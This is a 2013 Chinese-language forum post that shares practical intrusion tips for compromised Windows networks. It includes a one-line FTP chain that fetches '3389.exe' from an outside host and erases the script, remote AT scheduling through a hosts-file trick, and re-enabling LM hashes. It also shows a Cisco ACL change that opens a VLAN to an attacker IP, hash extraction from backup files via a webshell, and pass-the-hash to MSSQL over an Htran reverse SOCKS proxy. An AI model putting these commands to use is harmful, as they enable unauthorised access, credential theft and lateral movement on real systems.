论坛
门户
内部优惠
喜欢
话题
VIP会员
搜索
新浪微博
登录
注册
100%
100%
首页
>
网络技术
>
网站安全
>
渗透测试技巧分享
回复
« 返回列表
灯火互联
管理员
注册日期
2011-07-27
发帖数
41778
QQ
火币
41290枚
粉丝
1086
关注
100
加关注
写私信
打招呼
阅读:
1836
回复:
0
渗透测试技巧分享
楼主
#
更多
只看楼主
倒序阅读
发布于:2013-03-18 13:19
保存
100%
100%
[]
1
1.AT時提示綁定句柄無效
經常碰到的這個問題,百度搜索的全部都沒一個能解決的。
正確的解決辦法是先在地址欄\\1.1.1.1 得到對方機器名,例如ADMINPC,然後,CMD
echo 1.1.1.1 ADMINPC >>C:\
windows
\system32\drivers\etc\hosts
然後就可以at了,再也不會提示句柄無效了。
後記:其實也不需要對方的機器名,隨便echo 一個字符代替機器名即可。
2.ftp
一句話
download
以前都是一個一個echo,然後ftp-s,很不方便,用下面的辦法吧
echo open 10.0.0.1 > o;echo user 1 1 >> o ;echo get 3389.exe >> o ;echo quit >> o ;ftp -n -s:o ;del /F /Q o
3.
針對
VISTA
以上作業系統禁用
NTHASH
高級系統默認都是禁止了LMHASH,在滲透途中是件很不方便的事,按照下圖可以啟動LMHASH,不過需要更改密碼后生效,如果用戶不更改密碼,LMHASH不會儲存,適用于比較敏感的目標,沒事天天改密碼的類型。這辦法適用於無WCE的時代.
捕获
.gif(
缩略图
)
图片:20130318101009856.jpg
4.
修改
cisco access list
避免繁瑣的
”
佛跳牆
”
過程
ssh 登陸IP,x.x.x.x
登陸
en
IPE_CISCO#show access-list 查看下要配置的list 例如需要訪問的服務器在VLAN103
IPE_CISCO#config
IPE_CISCO#terminal
IPE_CISCO#access-list 103 permit host 10.1.6.66 //允許這個IP訪問VLAN103所有的伺服器
IPE_CISCO#int vlan 103
IPE_CISCO#ip access-group 103 out
IPE_CISCO#exit
5.BKF
文件的利用
web
shell 環境下,提權無門,發現一BKF,Copy Downlaod,虛擬機還原,WINPE 替換shift,get hash
然後去試試目標的pass.
6.
基於替換系統
hash
的
SQL
入侵
已知目標系統HASH:
administrator:zhu:00000000000000000000000000000000:4A59CF37F6xxxxxx
系統OS:2003,SQLSERVER 2008,目測該hash超過14位。(2003 默認為LMHASH,密碼超過14位則全000000000或者AA3DXXX)
已有webshell,提權無門,則通過Htran 反彈一條sock5代理,本地WCE替換為目標HASH,使用sock5代理連接MSSQL,認證選擇NT。
連上,完成。
7.
注意
Command.com
這個命令存在很久了在遙遠的WIN95~WIN2003一直存在著,一直被忽略的對象,其實,它也能替代CMD。
8.
當
ipc$
遇到帶
“
號密碼時
password is:O*"#~)GbU[x
net use \\127.0.0.1 "O*\"#~)GbU[x" /u:administrator
“號前加\即可解決問題。
喜欢
0
评分
0
最新喜欢:
淘宝天猫隐藏优惠券地址
回复
100%
发帖
回复
« 返回列表
普通帖
您需要登录后才可以回帖,
登录
或者
注册
100%
返回顶部
关闭
最新喜欢